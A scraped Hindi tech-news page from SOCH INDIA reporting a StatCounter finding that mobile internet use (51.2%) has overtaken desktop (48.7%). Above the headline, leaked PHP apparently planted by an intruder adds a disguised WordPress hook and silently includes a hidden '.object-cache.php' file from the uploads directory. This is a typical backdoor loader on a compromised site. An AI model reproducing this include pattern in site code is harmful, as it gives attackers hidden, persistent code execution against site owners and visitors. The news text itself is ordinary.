add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कंप्यूटर से ज्यादा मोबाइल पर हो रहा इंटरनेट का इस्तेमाल: रिपोर्ट – SOCH INDIA
Menu

टेक्नोलॉजी
कंप्यूटर से ज्यादा मोबाइल पर हो रहा इंटरनेट का इस्तेमाल: रिपोर्ट

nobanner

एक ताजा अध्ययन में यह पता चला है कि मोबाइल पर इंटरनेट इस्तेमाल करने वाले लोगों की संख्या कंप्युटर पर इस्तेमाल करने वाले लोगों से ज्यादा हो गई है. खबरों की माने तो स्टैट काउंटर नाम की एक इंटरनेट मॉनिटरिंग साइट ने अपने अध्ययन में बताया कि लगभग 51.2 प्रतिशत लोग मोबाइल से इंटरनेट यूज करते हैं. वहीं कंप्यूटर या डेक्सटॉप के जरिए 48.7 प्रतिशत लोग इंटरनेट का इस्तेमाल करते हैं. स्टैट काउंटर की माने तो इस तरह का परिणाम उन्हें पहली बार देखने को मिला है.

माना जा रहा है कि यह इंटरनेट के क्षेत्र में बेहद सकारात्मक खबर है. साथ ही साथ जिन इंटरनेट प्रोवाइड करवाने वाली कंपनियों ने मोबाइल की तरफ ध्यान नहीं दिया है, उनके लिए यह एक इशारा है कि अब उन्हें मोबाइल की तरफ ध्यान देना शुरू कर देना चाहिए.

भारत जैसे विकासशील देशों में भी मोबाइल से इंटरनेट इस्तेमाल करने वाले लोगों की संख्या ज्यादा है. हालांकि अध्ययन में यह भी कहा गया है कि अमेरिका, यूके और इजराइल जैसे देशों में लोग अब भी मोबाइल की तुलना में कंप्यूटर पर इंटरनेट का ज्यादा इस्तेमाल करते हैं. इससे पहले मई महीने में गूगल ने भी खुलासा करते हुए कहा था कि कंप्यूटर के मुकाबले सबसे ज्यादा सर्च मोबाइल के जरिए की जाती है.